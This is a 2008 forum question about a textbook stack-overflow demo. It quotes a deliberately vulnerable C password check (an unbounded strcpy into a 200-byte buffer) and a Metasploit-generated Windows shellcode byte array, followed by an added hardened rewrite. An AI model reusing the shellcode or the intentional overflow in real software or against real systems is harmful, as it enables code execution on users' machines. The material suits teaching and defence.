[Help] Problem with stack overflow shellcode
Posted: 2008-4-28 19:50
In the debug build of the code below, I enter abc and, in OllyICE.exe, manually change the return address after verify_password() to the address of the shellcode. Why does the program go into an infinite loop inside the shellcode after jumping to it?
I verified this shellcode with
__asm{
lea eax,scode
call eax
}
It still doesn't work after I add #include <windows.h> to the code.
My environment is WinXP SP2.
/*****************************************************************************
To be the apostrophe which changed "Impossible" into "I'm possible"!
POC code of chapter 4.2 in book "Vulnerability Exploit and Analysis Technique"
file name : stack_overflow_var.c
author : failwest
date : 2006.9.20
description : demo show nearby var overrun in stack
input 8 letters to bypass authentication
Noticed : compiled with VC6.0 and built into debug version
version : 1.0
E-mail : failwest@gmail.com
Only for educational purposes enjoy the fun from exploiting :)
******************************************************************************/
#include <stdio.h>
#include <string.h>   /* strcmp, strcat, strcpy */
#define PASSWORD "1234567"
/* win32_exec - EXITFUNC=seh CMD=cmd /c echo 123d:/shellcode.txt Size=188+8 Encoder=PexFnstenvSub http://metasploit.com */
unsigned char scode[] =
"\x90\x90\x90\x90\x90\x90\x90\x90\x2b\xc9\x83\xe9\xd7\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xe0"
"\xf4\xfe\x17\x83\xeb\xfc\xe2\xf4\x1c\x1c\xba\x17\xe0\xf4\x75\x52"
"\xdc\x7f\x82\x12\x98\xf5\x11\x9c\xaf\xec\x75\x48\xc0\xf5\x15\x5e"
"\x6b\xc0\x75\x16\x0e\xc5\x3e\x8e\x4c\x70\x3e\x63\xe7\x35\x34\x1a"
"\xe1\x36\x15\xe3\xdb\xa0\xda\x13\x95\x11\x75\x48\xc4\xf5\x15\x71"
"\x6b\xf8\xb5\x9c\xbf\xe8\xff\xfc\x6b\xe8\x75\x16\x0b\x7d\xa2\x33"
"\xe4\x37\xcf\xd7\x84\x7f\xbe\x27\x65\x34\x86\x1b\x6b\xb4\xf2\x9c"
"\x90\xe8\x53\x9c\x88\xfc\x15\x1e\x6b\x74\x4e\x17\xe0\xf4\x75\x7f"
"\xdc\xab\xcf\xe1\x80\xa2\x15\x1a\x88\x04\x74\x13\xbf\x9c\x66\xe9"
"\x6a\xfa\xa9\xe8\x07\x1c\x10\xe8\x1f\x0b\x9d\x7a\x84\xd4\xd1\x74"
"\xc0\x91\x9d\x7f\x8f\xd4\xcf\x25\xd3\xca\xc0\x73\xda\xdb\x8d\x7f"
"\x85\x98\x92\x74\x8f\x90\x9b\x39\x94\x8c\x8a\x17";
int verify_password (char *password)
{
    int authenticated;
    char buffer[200];                   // add local buff
    authenticated=strcmp(password,PASSWORD);
    strcat(password,(char *)scode);     // append the shellcode bytes to the input
    strcpy(buffer,password);            // overflowed here! (unbounded copy into buffer)
    return authenticated;
}
int main()
{
    int valid_flag=0;
    char password[1024];
    /*
    __asm{
    lea eax,scode
    call eax
    }
    */
    while(1)
    {
        printf("please input password: ");
        scanf("%s",password);
        valid_flag = verify_password(password);
        if(valid_flag)
        {
            printf("incorrect password!\n\n");
        }
        else
        {
            printf("Congratulation! You have passed the verification!\n");
            break;
        }
    }
    return 0;
}
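The defensive counterpart of the demo above, added here as an example; it is not part of the original post or of failwest's book code, and the names verify_password_safe and read_line are assumed. It keeps the same 200-byte local buffer but bounds every copy into it: an input that does not fit (terminator included) is rejected before a single byte is written to the stack, and the unbounded scanf("%s") is replaced by a line reader that reports oversized input instead of truncating it silently.

```c
#include <stdio.h>
#include <string.h>

#define PASSWORD "1234567"
#define BUFFER_SIZE 200   /* same local buffer size as the demo above */

/* Hardened counterpart of verify_password() (assumed name, not from the book).
 * Returns 0 on match, 1 on mismatch, -1 when the input is NULL or would not
 * fit in the local buffer together with its terminating NUL. */
int verify_password_safe(const char *password)
{
    char buffer[BUFFER_SIZE];
    const char *nul;

    if (password == NULL)
        return -1;
    /* Search for the terminator within the first BUFFER_SIZE bytes only, so
     * an unterminated or oversized input never causes an out-of-bounds read. */
    nul = memchr(password, '\0', BUFFER_SIZE);
    if (nul == NULL)
        return -1;                      /* strlen(password) >= BUFFER_SIZE */
    /* Bounded copy: (nul - password) + 1 <= BUFFER_SIZE by construction. */
    memcpy(buffer, password, (size_t)(nul - password) + 1);
    return strcmp(buffer, PASSWORD) != 0;
}

/* Bounded replacement for scanf("%s", password). Reads one line into dst and
 * strips the newline. Returns 0 on success, -1 when the line was longer than
 * dst can hold (the excess is drained so the next read starts on a fresh
 * line), and -2 on EOF or read error. */
int read_line(char *dst, size_t dst_size, FILE *in)
{
    size_t len;
    int c, drained = 0;

    if (fgets(dst, (int)dst_size, in) == NULL)
        return -2;
    len = strlen(dst);
    if (len > 0 && dst[len - 1] == '\n') {
        dst[len - 1] = '\0';
        return 0;
    }
    /* No newline in dst: either the line filled dst exactly, the input ended
     * without a newline, or the line was too long. Only the last case leaves
     * characters behind, which we drain and report. */
    while ((c = getc(in)) != EOF && c != '\n')
        drained = 1;
    return drained ? -1 : 0;
}

int main(void)
{
    char password[1024];
    int rc;

    for (;;) {
        printf("please input password: ");
        rc = read_line(password, sizeof password, stdin);
        if (rc == -2)
            break;                      /* EOF: stop instead of spinning */
        if (rc == -1) {
            printf("input too long, rejected\n\n");
            continue;
        }
        rc = verify_password_safe(password);
        if (rc == 0) {
            printf("Congratulation! You have passed the verification!\n");
            break;
        }
        printf(rc < 0 ? "input too long, rejected\n\n" : "incorrect password!\n\n");
    }
    return 0;
}
```

The length check happens before the copy, not after, which is the property the original verify_password() lacks: strcpy() into buffer[200] writes whatever the caller supplied, so the 1024-byte password array in main() (plus the appended scode bytes) can overrun buffer and the saved return address above it. Compiling with /GS (VC7 and later) or an equivalent stack-protector flag adds a second line of defence, but it detects the overrun only after the write has happened; the bounded copy prevents it.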